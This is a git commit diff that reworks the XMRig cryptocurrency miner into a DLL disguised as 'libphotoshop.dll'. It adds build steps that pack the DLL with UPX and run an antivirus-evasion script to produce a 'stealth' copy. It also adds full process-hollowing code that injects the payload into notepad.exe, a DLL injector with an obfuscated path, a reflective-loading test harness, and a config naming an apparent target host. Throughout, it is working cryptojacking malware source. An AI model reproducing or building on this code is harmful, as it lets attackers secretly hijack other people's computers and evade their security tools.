Code can be built now without requiring any external DLLs. xmrig.cpp has been changed so it can run like Reflective DLL Injection. Reflective DLL injection is not tested.

This commit is contained in:
someone 2025-11-27 19:04:35 +01:00
parent 93551f5c0d
commit f5d0d904e4
14 changed files with 1745 additions and 204 deletions


@ -1,54 +1,51 @@
cmake_minimum_required(VERSION 3.10)
project(photoshop)
option(WITH_HWLOC "Enable hwloc support" ON)
option(WITH_CN_LITE "Enable CryptoNight-Lite algorithms family" ON)
option(WITH_CN_HEAVY "Enable CryptoNight-Heavy algorithms family" ON)
option(WITH_CN_PICO "Enable CryptoNight-Pico algorithm" ON)
option(WITH_CN_FEMTO "Enable CryptoNight-UPX2 algorithm" ON)
option(WITH_RANDOMX "Enable RandomX algorithms family" ON)
option(WITH_ARGON2 "Enable Argon2 algorithms family" ON)
option(WITH_KAWPOW "Enable KawPow algorithms family" ON)
option(WITH_GHOSTRIDER "Enable GhostRider algorithm" ON)
option(WITH_HTTP "Enable HTTP protocol support (client/server)" ON)
option(WITH_DEBUG_LOG "Enable debug log output" OFF)
option(WITH_TLS "Enable OpenSSL support" ON)
option(WITH_ASM "Enable ASM PoW implementations" ON)
option(WITH_MSR "Enable MSR mod & 1st-gen Ryzen fix" ON)
option(WITH_ENV_VARS "Enable environment variables support in config file" OFF)
option(WITH_EMBEDDED_CONFIG "Enable internal embedded JSON config" ON)
option(WITH_OPENCL "Enable OpenCL backend" OFF)
option(WITH_HWLOC "Enable hwloc support" ON)
option(WITH_CN_LITE "Enable CryptoNight-Lite algorithms family" ON)
option(WITH_CN_HEAVY "Enable CryptoNight-Heavy algorithms family" ON)
option(WITH_CN_PICO "Enable CryptoNight-Pico algorithm" ON)
option(WITH_CN_FEMTO "Enable CryptoNight-UPX2 algorithm" ON)
option(WITH_RANDOMX "Enable RandomX algorithms family" ON)
option(WITH_ARGON2 "Enable Argon2 algorithms family" ON)
option(WITH_KAWPOW "Enable KawPow algorithms family" ON)
option(WITH_GHOSTRIDER "Enable GhostRider algorithm" ON)
option(WITH_HTTP "Enable HTTP protocol support (client/server)" ON)
option(WITH_DEBUG_LOG "Enable debug log output" OFF)
option(WITH_TLS "Enable OpenSSL support" ON)
option(WITH_ASM "Enable ASM PoW implementations" ON)
option(WITH_MSR "Enable MSR mod & 1st-gen Ryzen fix" ON)
option(WITH_ENV_VARS "Enable environment variables support in config file" OFF)
option(WITH_EMBEDDED_CONFIG "Enable internal embedded JSON config" ON)
option(WITH_OPENCL "Enable OpenCL backend" OFF)
set(WITH_OPENCL_VERSION 200 CACHE STRING "Target OpenCL version")
set_property(CACHE WITH_OPENCL_VERSION PROPERTY STRINGS 120 200 210 220)
option(WITH_CUDA "Enable CUDA backend" OFF)
option(WITH_NVML "Enable NVML (NVIDIA Management Library) support (only if CUDA backend enabled)" OFF)
option(WITH_ADL "Enable ADL (AMD Display Library) or sysfs support (only if OpenCL backend enabled)" OFF)
option(WITH_STRICT_CACHE "Enable strict checks for OpenCL cache" ON)
option(WITH_CUDA "Enable CUDA backend" OFF)
option(WITH_NVML "Enable NVML (NVIDIA Management Library) support (only if CUDA backend enabled)" OFF)
option(WITH_ADL "Enable ADL (AMD Display Library) or sysfs support (only if OpenCL backend enabled)" OFF)
option(WITH_STRICT_CACHE "Enable strict checks for OpenCL cache" ON)
option(WITH_INTERLEAVE_DEBUG_LOG "Enable debug log for threads interleave" OFF)
option(WITH_PROFILING "Enable profiling for developers" OFF)
option(WITH_SSE4_1 "Enable SSE 4.1 for Blake2" ON)
option(WITH_AVX2 "Enable AVX2 for Blake2" ON)
option(WITH_VAES "Enable VAES instructions for Cryptonight" ON)
option(WITH_BENCHMARK "Enable builtin RandomX benchmark and stress test" OFF)
option(WITH_SECURE_JIT "Enable secure access to JIT memory" OFF)
option(WITH_DMI "Enable DMI/SMBIOS reader" ON)
option(BUILD_STATIC "Build static binary" OFF)
option(ARM_V8 "Force ARMv8 (64 bit) architecture, use with caution if automatic detection fails, but you sure it may work" OFF)
option(ARM_V7 "Force ARMv7 (32 bit) architecture, use with caution if automatic detection fails, but you sure it may work" OFF)
option(HWLOC_DEBUG "Enable hwloc debug helpers and log" OFF)
option(WITH_PROFILING "Enable profiling for developers" OFF)
option(WITH_SSE4_1 "Enable SSE 4.1 for Blake2" ON)
option(WITH_AVX2 "Enable AVX2 for Blake2" ON)
option(WITH_VAES "Enable VAES instructions for Cryptonight" ON)
option(WITH_BENCHMARK "Enable builtin RandomX benchmark and stress test" OFF)
option(WITH_SECURE_JIT "Enable secure access to JIT memory" OFF)
option(WITH_DMI "Enable DMI/SMBIOS reader" ON)
option(BUILD_STATIC "Build static binary" OFF)
option(ARM_V8 "Force ARMv8 (64 bit) architecture, use with caution if automatic detection fails, but you sure it may work" OFF)
option(ARM_V7 "Force ARMv7 (32 bit) architecture, use with caution if automatic detection fails, but you sure it may work" OFF)
option(HWLOC_DEBUG "Enable hwloc debug helpers and log" OFF)
set(CMAKE_MODULE_PATH ${CMAKE_MODULE_PATH} "${CMAKE_SOURCE_DIR}/cmake")
include (CheckIncludeFile)
include (cmake/cpu.cmake)
include (cmake/os.cmake)
include (src/base/base.cmake)
include (src/backend/backend.cmake)
set(HEADERS
"${HEADERS_BASE}"
"${HEADERS_BASE_HTTP}"
@ -58,7 +55,7 @@ set(HEADERS
#src/core/config/Config_platform.h
src/core/config/Config.h
#src/core/config/ConfigTransform.h
#src/core/config/usage.h
# src/core/config/usage.h <-- REMOVED
src/core/Controller.h
src/core/Miner.h
src/core/Taskbar.h
@ -148,7 +145,6 @@ if (WITH_HWLOC)
list(APPEND HEADERS_CRYPTO
src/crypto/common/NUMAMemoryPool.h
)
list(APPEND SOURCES_CRYPTO
src/crypto/common/NUMAMemoryPool.cpp
src/crypto/common/VirtualMemory_hwloc.cpp
@ -157,18 +153,16 @@ endif()
if (XMRIG_OS_WIN)
list(APPEND SOURCES_OS
res/app.rc
# res/app.rc <-- REMOVED
src/App_win.cpp
src/crypto/common/VirtualMemory_win.cpp
)
set(EXTRA_LIBS ws2_32 psapi iphlpapi userenv dbghelp)
set(EXTRA_LIBS ws2_32 psapi iphlpapi userenv dbghelp crypt32)
elseif (XMRIG_OS_APPLE)
list(APPEND SOURCES_OS
src/App_unix.cpp
src/crypto/common/VirtualMemory_unix.cpp
)
find_library(IOKIT_LIBRARY IOKit)
find_library(CORESERVICES_LIBRARY CoreServices)
set(EXTRA_LIBS ${IOKIT_LIBRARY} ${CORESERVICES_LIBRARY})
@ -177,7 +171,6 @@ else()
src/App_unix.cpp
src/crypto/common/VirtualMemory_unix.cpp
)
if (XMRIG_OS_ANDROID)
set(EXTRA_LIBS pthread rt dl log)
elseif (XMRIG_OS_LINUX)
@ -185,7 +178,6 @@ else()
src/crypto/common/LinuxMemory.h
src/crypto/common/LinuxMemory.cpp
)
set(EXTRA_LIBS pthread rt dl)
elseif (XMRIG_OS_FREEBSD)
set(EXTRA_LIBS kvm pthread)
@ -205,38 +197,18 @@ include(cmake/ghostrider.cmake)
include(cmake/OpenSSL.cmake)
include(cmake/asm.cmake)
# OpenCL dynamic compilation
#find_package(OpenCL)
#if (OPENCL_FOUND)
# add_definitions(/DXMRIG_FEATURE_OPENCL /DCL_USE_DEPRECATED_OPENCL_1_2_APIS)
# include(src/backend/opencl/opencl.cmake)
# target_link_libraries(${CMAKE_PROJECT_NAME} ${OPENCL_LIBRARIES})
#endif()
# CUDA dynamic compilation
#find_package(CUDA)
#if (CUDA_FOUND)
# add_definitions(/DXMRIG_FEATURE_CUDA)
# include(src/backend/cuda/cuda.cmake)
# target_link_libraries(${CMAKE_PROJECT_NAME} ${CUDA_LIBRARIES})
#endif()
if (WITH_CN_LITE)
add_definitions(/DXMRIG_ALGO_CN_LITE)
endif()
if (WITH_CN_HEAVY)
add_definitions(/DXMRIG_ALGO_CN_HEAVY)
endif()
if (WITH_CN_PICO)
add_definitions(/DXMRIG_ALGO_CN_PICO)
endif()
if (WITH_CN_FEMTO)
add_definitions(/DXMRIG_ALGO_CN_FEMTO)
endif()
if (WITH_EMBEDDED_CONFIG)
add_definitions(/DXMRIG_FEATURE_EMBEDDED_CONFIG)
endif()
@ -253,28 +225,44 @@ if (WITH_DEBUG_LOG)
endif()
add_library(${CMAKE_PROJECT_NAME} SHARED ${HEADERS} ${SOURCES} ${SOURCES_OS} ${HEADERS_CRYPTO} ${SOURCES_CRYPTO} ${SOURCES_SYSLOG} ${TLS_SOURCES} ${XMRIG_ASM_SOURCES})
add_executable(injector ./dll_injector.cpp)
#add_executable(${CMAKE_PROJECT_NAME} ${HEADERS} ${SOURCES} ${SOURCES_OS} ${HEADERS_CRYPTO} ${SOURCES_CRYPTO} ${SOURCES_SYSLOG} ${TLS_SOURCES} ${XMRIG_ASM_SOURCES})
target_link_libraries(${CMAKE_PROJECT_NAME} ${XMRIG_ASM_LIBRARY} ${OPENSSL_LIBRARIES} ${UV_LIBRARIES} ${EXTRA_LIBS} ${CPUID_LIB} ${ARGON2_LIBRARY} ${ETHASH_LIBRARY} ${GHOSTRIDER_LIBRARY} pthread)
target_link_libraries(injector psapi ntdll)
target_link_options(${CMAKE_PROJECT_NAME} PRIVATE -static-libgcc -static-libstdc++ -static)
# --- FIXED LINKING BLOCK ---
if (WIN32)
target_link_options(${CMAKE_PROJECT_NAME} PRIVATE -mwindows)
target_link_libraries(${CMAKE_PROJECT_NAME}
# 1. Static Libraries
${XMRIG_ASM_LIBRARY}
${OPENSSL_LIBRARIES}
${UV_LIBRARIES}
${CPUID_LIB}
${ARGON2_LIBRARY}
${ETHASH_LIBRARY}
${GHOSTRIDER_LIBRARY}
# 2. Force Static Runtimes (Flags)
-static-libgcc
-static-libstdc++
-Wl,-Bstatic
# 3. Force Static Pthreads (Whole Archive)
-Wl,--whole-archive -lwinpthread -Wl,--no-whole-archive
# 4. Force MSVCRT
-lmsvcrt
# 5. System Libraries (Dynamic)
-Wl,-Bdynamic
${EXTRA_LIBS}
)
else()
target_link_libraries(${CMAKE_PROJECT_NAME} ${XMRIG_ASM_LIBRARY} ${OPENSSL_LIBRARIES} ${UV_LIBRARIES} ${EXTRA_LIBS} ${CPUID_LIB} ${ARGON2_LIBRARY} ${ETHASH_LIBRARY} ${GHOSTRIDER_LIBRARY})
endif()
# ---------------------------
if (WIN32)
if (NOT ARM_TARGET)
add_custom_command(TARGET ${CMAKE_PROJECT_NAME} POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy_if_different "${CMAKE_SOURCE_DIR}/bin/WinRing0/WinRing0x64.sys" $<TARGET_FILE_DIR:${CMAKE_PROJECT_NAME}>)
endif()
#add_custom_command(TARGET ${CMAKE_PROJECT_NAME} POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy_if_different "${CMAKE_SOURCE_DIR}/scripts/benchmark_1M.cmd" $<TARGET_FILE_DIR:${CMAKE_PROJECT_NAME}>)
#add_custom_command(TARGET ${CMAKE_PROJECT_NAME} POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy_if_different "${CMAKE_SOURCE_DIR}/scripts/benchmark_10M.cmd" $<TARGET_FILE_DIR:${CMAKE_PROJECT_NAME}>)
#add_custom_command(TARGET ${CMAKE_PROJECT_NAME} POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy_if_different "${CMAKE_SOURCE_DIR}/scripts/pool_mine_example.cmd" $<TARGET_FILE_DIR:${CMAKE_PROJECT_NAME}>)
#add_custom_command(TARGET ${CMAKE_PROJECT_NAME} POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy_if_different "${CMAKE_SOURCE_DIR}/scripts/solo_mine_example.cmd" $<TARGET_FILE_DIR:${CMAKE_PROJECT_NAME}>)
#add_custom_command(TARGET ${CMAKE_PROJECT_NAME} POST_BUILD COMMAND ${CMAKE_COMMAND} -E copy_if_different "${CMAKE_SOURCE_DIR}/scripts/rtm_ghostrider_example.cmd" $<TARGET_FILE_DIR:${CMAKE_PROJECT_NAME}>)
endif()
set(CMAKE_CXX_FLAGS_RELEASE "${CMAKE_CXX_FLAGS_RELEASE} -s")
if (CMAKE_CXX_COMPILER_ID MATCHES Clang AND CMAKE_BUILD_TYPE STREQUAL Release AND NOT CMAKE_GENERATOR STREQUAL Xcode)
add_custom_command(TARGET ${PROJECT_NAME} POST_BUILD COMMAND ${CMAKE_STRIP} "$<TARGET_FILE:${CMAKE_PROJECT_NAME}>")
endif()

1003
ai_prompt Normal file


80
build_cmd Normal file

@ -0,0 +1,80 @@
cmake -G Ninja .. \
-DCMAKE_BUILD_TYPE=Release \
-DCMAKE_SYSTEM_NAME=Windows \
-DCMAKE_C_COMPILER=/opt/llvm-mingw/bin/x86_64-w64-mingw32-clang \
-DCMAKE_CXX_COMPILER=/opt/llvm-mingw/bin/x86_64-w64-mingw32-clang++ \
-DCMAKE_RC_COMPILER=/opt/llvm-mingw/bin/x86_64-w64-mingw32-windres \
-DXMRIG_DEPS=$HOME/xmrig-deps/gcc/x64 \
-DCMAKE_FIND_LIBRARY_SUFFIXES=".a" \
-DWITH_TLS=ON \
-DWITH_EMBEDDED_CONFIG=ON \
-DCMAKE_C_FLAGS="-static -fPIC -mtune=generic -fno-lto -Wno-unused-command-line-argument -D_WIN32_WINNT=0x0601 -D__USE_MINGW_ANSI_STDIO=0" \
-DCMAKE_CXX_FLAGS="-static -fPIC -mtune=generic -fno-lto -Wno-unused-command-line-argument -D_WIN32_WINNT=0x0601 -D__USE_MINGW_ANSI_STDIO=0" \
-DCMAKE_SHARED_LINKER_FLAGS="-static -Wl,-Bstatic -Wl,--whole-archive -lwinpthread -Wl,--no-whole-archive -Wl,--allow-multiple-definition -Wl,--start-group -lmingw32 -lmingwex -lmsvcrt -lkernel32 -luser32 -ladvapi32 -lws2_32 -lpsapi -liphlpapi -luserenv -ldbghelp -lssp -lstdc++ -lstdc++fs -Wl,-lmsvcrt -Wl,-lmingwex -Wl,-lmingw32 -Wl,-lwinpthread -Wl,-lmsvcrt -Wl,-lkernel32 -Wl,-luser32 -Wl,-ladvapi32 -Wl,-lws2_32 -Wl,-lpsapi -Wl,-liphlpapi -Wl,-luserenv -Wl,-ldbghelp -Wl,-lssp -Wl,--end-group" \
-DCMAKE_EXE_LINKER_FLAGS="-static -Wl,-Bstatic -Wl,--whole-archive -lwinpthread -Wl,--no-whole-archive -Wl,--allow-multiple-definition"
ninja -j10
upx --best --lzma libphotoshop.dll -o libphotoshop_packed.dll
python3 ../upx_evasion.py libphotoshop_packed.dll -o libphotoshop_stealth.dll --keep-relocs
&& x86_64-w64-mingw32-g++ -o test_xmrig.exe ../test_xmrig.cpp libphotoshop.dll
OR for gcc use
cmake .. -G "Unix Makefiles" -DCMAKE_BUILD_TYPE=Release -DCMAKE_C_COMPILER=x86_64-w64-mingw32-gcc -DCMAKE_CXX_COMPILER=x86_64-w64-mingw32-g++ -DWITH_TLS=ON -DXMRIG_DEPS=$HOME/xmrig-deps/gcc/x64 -DCMAKE_SYSTEM_NAME=Windows -DCMAKE_SYSTEM_PROCESSOR=x86_64 -DWITH_EMBEDDED_CONFIG=ON && make -j $(nproc)
OR for CREATING ONE EXE WITHOUT DEPENDENCIES
 cmake -G Ninja .. \
-DCMAKE_BUILD_TYPE=Release \
-DCMAKE_SYSTEM_NAME=Windows \
-DCMAKE_C_COMPILER=/opt/llvm-mingw/bin/x86_64-w64-mingw32-clang \
-DCMAKE_CXX_COMPILER=/opt/llvm-mingw/bin/x86_64-w64-mingw32-clang++ \
-DCMAKE_RC_COMPILER=/opt/llvm-mingw/bin/x86_64-w64-mingw32-windres \
-DXMRIG_DEPS=$HOME/xmrig-deps/gcc/x64 \
-DWITH_TLS=ON \
-DWITH_EMBEDDED_CONFIG=ON
ninja -j10
 x86_64-w64-mingw32-g++ -o test_xmrig.exe ../test_xmrig.cpp libphotoshop.a \
-static -static-libgcc -static-libstdc++ \
$HOME/xmrig-deps/gcc/x64/lib/libssl.a \
$HOME/xmrig-deps/gcc/x64/lib/libcrypto.a \
$HOME/xmrig-deps/gcc/x64/lib/libuv.a \
$HOME/xmrig-deps/gcc/x64/lib/libhwloc.a \
-lpthread -lws2_32 -liphlpapi -lpsapi -luserenv -ldbghelp
cmake -G Ninja .. \
-DCMAKE_BUILD_TYPE=Release \
-DCMAKE_SYSTEM_NAME=Windows \
-DCMAKE_C_COMPILER=/opt/llvm-mingw/bin/x86_64-w64-mingw32-clang \
-DCMAKE_CXX_COMPILER=/opt/llvm-mingw/bin/x86_64-w64-mingw32-clang++ \
-DCMAKE_RC_COMPILER=/opt/llvm-mingw/bin/x86_64-w64-mingw32-windres \
-DXMRIG_DEPS=$HOME/xmrig-deps/gcc/x64 \
-DWITH_TLS=ON \
-DWITH_EMBEDDED_CONFIG=ON \
-DCMAKE_C_FLAGS="-fPIC -mtune=generic -fno-lto -D_WIN32_WINNT=0x0601" \
-DCMAKE_CXX_FLAGS="-fPIC -mtune=generic -fno-lto -D_WIN32_WINNT=0x0601" && \
ninja -j (math (nproc) - 2) && \
/opt/llvm-mingw/bin/x86_64-w64-mingw32-clang++ \
-o test_xmrig.exe \
../test_xmrig.cpp \
-L. libphotoshop.dll \
-static \
-static-libgcc \
-static-libstdc++ \
-Wl,--whole-archive -lwinpthread -Wl,--no-whole-archive \
-lmsvcrt
upx --best --lzma libphotoshop.dll -o libphotoshop_packed.dll
python3 ../upx_evasion.py libphotoshop_packed.dll -o libphotoshop_stealth.dll --keep-relocs


@ -0,0 +1,6 @@
find_path(HWLOC_INCLUDE_DIR NAMES hwloc.h PATHS "${XMRIG_DEPS}/include" NO_DEFAULT_PATH)
find_library(HWLOC_LIBRARY NAMES libhwloc.a hwloc PATHS "${XMRIG_DEPS}/lib" NO_DEFAULT_PATH)
set(HWLOC_LIBRARIES ${HWLOC_LIBRARY})
set(HWLOC_INCLUDE_DIRS ${HWLOC_INCLUDE_DIR})
include(FindPackageHandleStandardArgs)
find_package_handle_standard_args(HWLOC DEFAULT_MSG HWLOC_LIBRARY HWLOC_INCLUDE_DIR)


@ -0,0 +1,6 @@
find_path(UV_INCLUDE_DIR NAMES uv.h PATHS "${XMRIG_DEPS}/include" NO_DEFAULT_PATH)
find_library(UV_LIBRARY NAMES libuv.a uv PATHS "${XMRIG_DEPS}/lib" NO_DEFAULT_PATH)
set(UV_LIBRARIES ${UV_LIBRARY})
set(UV_INCLUDE_DIRS ${UV_INCLUDE_DIR})
include(FindPackageHandleStandardArgs)
find_package_handle_standard_args(UV DEFAULT_MSG UV_LIBRARY UV_INCLUDE_DIR)


@ -0,0 +1,46 @@
if (WITH_TLS)
find_path(OPENSSL_INCLUDE_DIR NAMES openssl/ssl.h PATHS "${XMRIG_DEPS}/include" NO_DEFAULT_PATH)
find_library(OPENSSL_CRYPTO_LIBRARY NAMES libcrypto.a crypto PATHS "${XMRIG_DEPS}/lib" NO_DEFAULT_PATH)
find_library(OPENSSL_SSL_LIBRARY NAMES libssl.a ssl PATHS "${XMRIG_DEPS}/lib" NO_DEFAULT_PATH)
set(OPENSSL_LIBRARIES ${OPENSSL_SSL_LIBRARY} ${OPENSSL_CRYPTO_LIBRARY})
set(OPENSSL_INCLUDE_DIRS ${OPENSSL_INCLUDE_DIR})
include(FindPackageHandleStandardArgs)
find_package_handle_standard_args(OpenSSL DEFAULT_MSG OPENSSL_LIBRARIES OPENSSL_INCLUDE_DIR)
if (OPENSSL_FOUND)
set(TLS_SOURCES
src/base/net/stratum/Tls.cpp
src/base/net/stratum/Tls.h
src/base/net/tls/ServerTls.cpp
src/base/net/tls/ServerTls.h
src/base/net/tls/TlsConfig.cpp
src/base/net/tls/TlsConfig.h
src/base/net/tls/TlsContext.cpp
src/base/net/tls/TlsContext.h
src/base/net/tls/TlsGen.cpp
src/base/net/tls/TlsGen.h
)
include_directories(${OPENSSL_INCLUDE_DIR})
if (WITH_HTTP)
set(TLS_SOURCES ${TLS_SOURCES}
src/base/net/https/HttpsClient.cpp
src/base/net/https/HttpsClient.h
src/base/net/https/HttpsContext.cpp
src/base/net/https/HttpsContext.h
src/base/net/https/HttpsServer.cpp
src/base/net/https/HttpsServer.h
)
endif()
add_definitions(-DXMRIG_FEATURE_TLS)
else()
message(FATAL_ERROR "OpenSSL NOT found: use `-DWITH_TLS=OFF` to build without TLS support")
endif()
else()
set(TLS_SOURCES "")
set(OPENSSL_LIBRARIES "")
remove_definitions(-DXMRIG_FEATURE_TLS)
endif()


@ -145,7 +145,7 @@ bool InjectDLL(DWORD pid, const std::string& dllPathObf) {
// Step 4: Wait for module list update, then get remote DLL base
Sleep(2000); // 2s delay for explorer to register module
HMODULE hRemoteDll = GetRemoteModuleBase(hProcess, "libxmrig-notls.dll");
HMODULE hRemoteDll = GetRemoteModuleBase(hProcess, "libphotoshop.dll");
if (!hRemoteDll) {
std::cerr << "GetRemoteModuleBase failed - DLL not loaded? Check LoadLibrary exit code above.\n";
CloseHandle(hProcess);
@ -166,7 +166,7 @@ int main() {
return 1;
}
std::string dllPathPlain = "C:\\Users\\MyWindowsUser\\Downloads\\test_on_windows\\libxmrig-notls.dll";
std::string dllPathPlain = "C:\\Users\\MyWindowsUser\\Downloads\\no_AV_here\\libphotoshop.dll";
std::string dllPathObf = XORObfuscate(dllPathPlain);
if (InjectDLL(pid, dllPathObf)) {

118
inject_and_hollow.cpp Normal file

@ -0,0 +1,118 @@
#include <windows.h>
#include <winternl.h>
#include <iostream>
#include <vector>
#include <string>
typedef NTSTATUS(NTAPI* pNtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAddress);
typedef NTSTATUS(NTAPI* pNtQueryInformationProcess)(HANDLE ProcessHandle, PROCESSINFOCLASS ProcessInformationClass, PVOID ProcessInformation, ULONG ProcessInformationLength, PULONG ReturnLength);
int main() {
// Path to the legitimate process to hollow (e.g., a benign system exe)
const char* targetPath = "C:\\Windows\\System32\\notepad.exe"; // Or explorer.exe
// Path to your malicious PE executable (the payload to inject as the new image)
const char* payloadPath = "C:\\Users\\MyWindowsUser\\Downloads\\no_AV_here\\libphotoshop.dll"; // Replace with your xmrig.exe or equivalent PE
STARTUPINFOA si = { sizeof(si) };
PROCESS_INFORMATION pi = { 0 };
// Step 1: Create suspended process
BOOL created = CreateProcessA(NULL, (LPSTR)targetPath, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &si, &pi);
if (!created) {
std::cerr << "CreateProcessA failed: " << GetLastError() << std::endl;
return 1;
}
// Step 2: Get PEB and image base
PROCESS_BASIC_INFORMATION pbi;
ULONG returnLength;
pNtQueryInformationProcess NtQuery = (pNtQueryInformationProcess)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtQueryInformationProcess");
NTSTATUS status = NtQuery(pi.hProcess, ProcessBasicInformation, &pbi, sizeof(pbi), &returnLength);
if (status != 0) {
std::cerr << "NtQueryInformationProcess failed: " << status << std::endl;
ResumeThread(pi.hThread); CloseHandle(pi.hProcess); CloseHandle(pi.hThread);
return 1;
}
PVOID imageBase;
PVOID pebImageBasePtr = (PVOID)((BYTE*)pbi.PebBaseAddress + 0x10); // Offset for ImageBaseAddress in x64 PEB
if (!ReadProcessMemory(pi.hProcess, pebImageBasePtr, &imageBase, sizeof(imageBase), NULL)) {
std::cerr << "ReadProcessMemory (ImageBase) failed: " << GetLastError() << std::endl;
ResumeThread(pi.hThread); CloseHandle(pi.hProcess); CloseHandle(pi.hThread);
return 1;
}
// Step 3: Unmap original image
pNtUnmapViewOfSection NtUnmap = (pNtUnmapViewOfSection)GetProcAddress(GetModuleHandle("ntdll.dll"), "NtUnmapViewOfSection");
status = NtUnmap(pi.hProcess, imageBase);
if (status != 0) {
std::cerr << "NtUnmapViewOfSection failed: " << status << std::endl;
ResumeThread(pi.hThread); CloseHandle(pi.hProcess); CloseHandle(pi.hThread);
return 1;
}
// Step 4: Read payload PE from disk
HANDLE hFile = CreateFileA(payloadPath, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (hFile == INVALID_HANDLE_VALUE) {
std::cerr << "CreateFile (payload) failed: " << GetLastError() << std::endl;
ResumeThread(pi.hThread); CloseHandle(pi.hProcess); CloseHandle(pi.hThread);
return 1;
}
DWORD payloadSize = GetFileSize(hFile, NULL);
std::vector<BYTE> payload(payloadSize);
ReadFile(hFile, payload.data(), payloadSize, NULL, NULL);
CloseHandle(hFile);
// Parse payload headers
PIMAGE_DOS_HEADER dosHeader = (PIMAGE_DOS_HEADER)payload.data();
PIMAGE_NT_HEADERS ntHeader = (PIMAGE_NT_HEADERS)(payload.data() + dosHeader->e_lfanew);
PVOID payloadImageBase = (PVOID)ntHeader->OptionalHeader.ImageBase;
SIZE_T payloadImageSize = ntHeader->OptionalHeader.SizeOfImage;
// Step 5: Allocate memory in target process (prefer payload's base, but fallback if occupied)
PVOID newImageBase = VirtualAllocEx(pi.hProcess, payloadImageBase, payloadImageSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (!newImageBase) {
newImageBase = VirtualAllocEx(pi.hProcess, NULL, payloadImageSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
if (!newImageBase) {
std::cerr << "VirtualAllocEx failed: " << GetLastError() << std::endl;
ResumeThread(pi.hThread); CloseHandle(pi.hProcess); CloseHandle(pi.hThread);
return 1;
}
}
// Step 6: Write headers and sections
WriteProcessMemory(pi.hProcess, newImageBase, payload.data(), ntHeader->OptionalHeader.SizeOfHeaders, NULL);
PIMAGE_SECTION_HEADER sectionHeader = IMAGE_FIRST_SECTION(ntHeader);
for (WORD i = 0; i < ntHeader->FileHeader.NumberOfSections; i++) {
PVOID sectionDest = (PVOID)((SIZE_T)newImageBase + sectionHeader->VirtualAddress);
PVOID sectionSrc = (PVOID)(payload.data() + sectionHeader->PointerToRawData);
WriteProcessMemory(pi.hProcess, sectionDest, sectionSrc, sectionHeader->SizeOfRawData, NULL);
sectionHeader++;
}
// Step 7: Handle relocations if base changed
if (newImageBase != payloadImageBase) {
PIMAGE_DATA_DIRECTORY relocDir = &ntHeader->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC];
if (relocDir->VirtualAddress) {
PIMAGE_BASE_RELOCATION reloc = (PIMAGE_BASE_RELOCATION)((SIZE_T)newImageBase + relocDir->VirtualAddress);
SIZE_T delta = (SIZE_T)newImageBase - (SIZE_T)payloadImageBase;
while (reloc->VirtualAddress) {
PWORD entry = (PWORD)((SIZE_T)reloc + sizeof(IMAGE_BASE_RELOCATION));
for (DWORD j = 0; j < (reloc->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION)) / sizeof(WORD); j++, entry++) {
if ((*entry >> 12) == IMAGE_REL_BASED_DIR64) {
PULONG64 ptr = (PULONG64)((SIZE_T)newImageBase + reloc->VirtualAddress + (*entry & 0xFFF));
ULONG64 oldValue = 0;
ReadProcessMemory(pi.hProcess, ptr, &oldValue, sizeof(ULONG64), NULL);
oldValue += delta;
WriteProcessMemory(pi.hProcess, ptr, &oldValue, sizeof(ULONG64), NULL);
}
}
reloc = (PIMAGE_BASE_RELOCATION)((SIZE_T)reloc + reloc->SizeOfBlock);
}
}
}
// Step 8: Update PEB image base
WriteProcessMemory(pi.hProcess, pebImageBasePtr, &newImageBase, sizeof(newImageBase), NULL);
// Step 9: Update thread context with new entry point
CONTEXT ctx = { 0 };
ctx.ContextFlags = CONTEXT_FULL;
GetThreadContext(pi.hThread, &ctx);
ctx.Rcx = (DWORD64)newImageBase + ntHeader->OptionalHeader.AddressOfEntryPoint; // Entry point in RCX for x64
SetThreadContext(pi.hThread, &ctx);
// Step 10: Resume thread
ResumeThread(pi.hThread);
std::cout << "Process hollowed and payload injected into PID " << pi.dwProcessId << std::endl;
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
return 0;
}

51
rditest.cpp Normal file

@ -0,0 +1,51 @@
#include <windows.h>
#include <iostream>
#include <string>
// Function pointer type for the exported RdiEntry function
typedef DWORD (WINAPI *RDI_ENTRY_FUNC)(LPVOID);
int main() {
// --- 1. Define DLL Name ---
const std::string dllName = "libphotoshop.dll";
// --- 2. Load the DLL (Emulates part of the injection process) ---
std::cout << "[Tester] Attempting to LoadLibrary: " << dllName << std::endl;
HMODULE hDll = LoadLibraryA(dllName.c_str());
if (!hDll) {
std::cerr << "[ERROR] Could not load DLL. GetLastError: " << GetLastError() << std::endl;
return 1;
}
// --- 3. Get the RDI Entry Point Address ---
const std::string entryFuncName = "RdiEntry";
std::cout << "[Tester] Looking up exported function: " << entryFuncName << std::endl;
RDI_ENTRY_FUNC RdiEntry = (RDI_ENTRY_FUNC)GetProcAddress(hDll, entryFuncName.c_str());
if (!RdiEntry) {
std::cerr << "[ERROR] Could not find RdiEntry function. Check export list." << std::endl;
FreeLibrary(hDll);
return 1;
}
// --- 4. Execute the Payload Entry Point ---
std::cout << "[Tester] Calling RdiEntry payload function..." << std::endl;
DWORD dwResult = RdiEntry(NULL); // Execute the mining payload logic
std::cout << "[Tester] RdiEntry returned: " << dwResult << std::endl;
std::cout << "[Tester] Execution initiated. Check Task Manager for CPU spike." << std::endl;
// NOTE: If the payload enters an infinite loop (like xmrig often does),
// the tester will hang here. This confirms execution.
// If the payload successfully threads itself and returns immediately,
// you might reach the FreeLibrary call quickly.
// For testing stability, let the payload run for a bit before trying to exit.
// Sleep(60000); // Optional: Wait 60 seconds to observe mining (uncomment if needed)
// FreeLibrary(hDll); // Commented out, as the payload is now running on the tester's thread
return 0;
}

2
resume.cfg Normal file

@ -0,0 +1,2 @@
resume_from=zorgzaamdemo.pluriformzorg.nl
index=122


@ -5,6 +5,9 @@
#include <winnt.h>
#include <string>
#include <cstring> // for strcpy
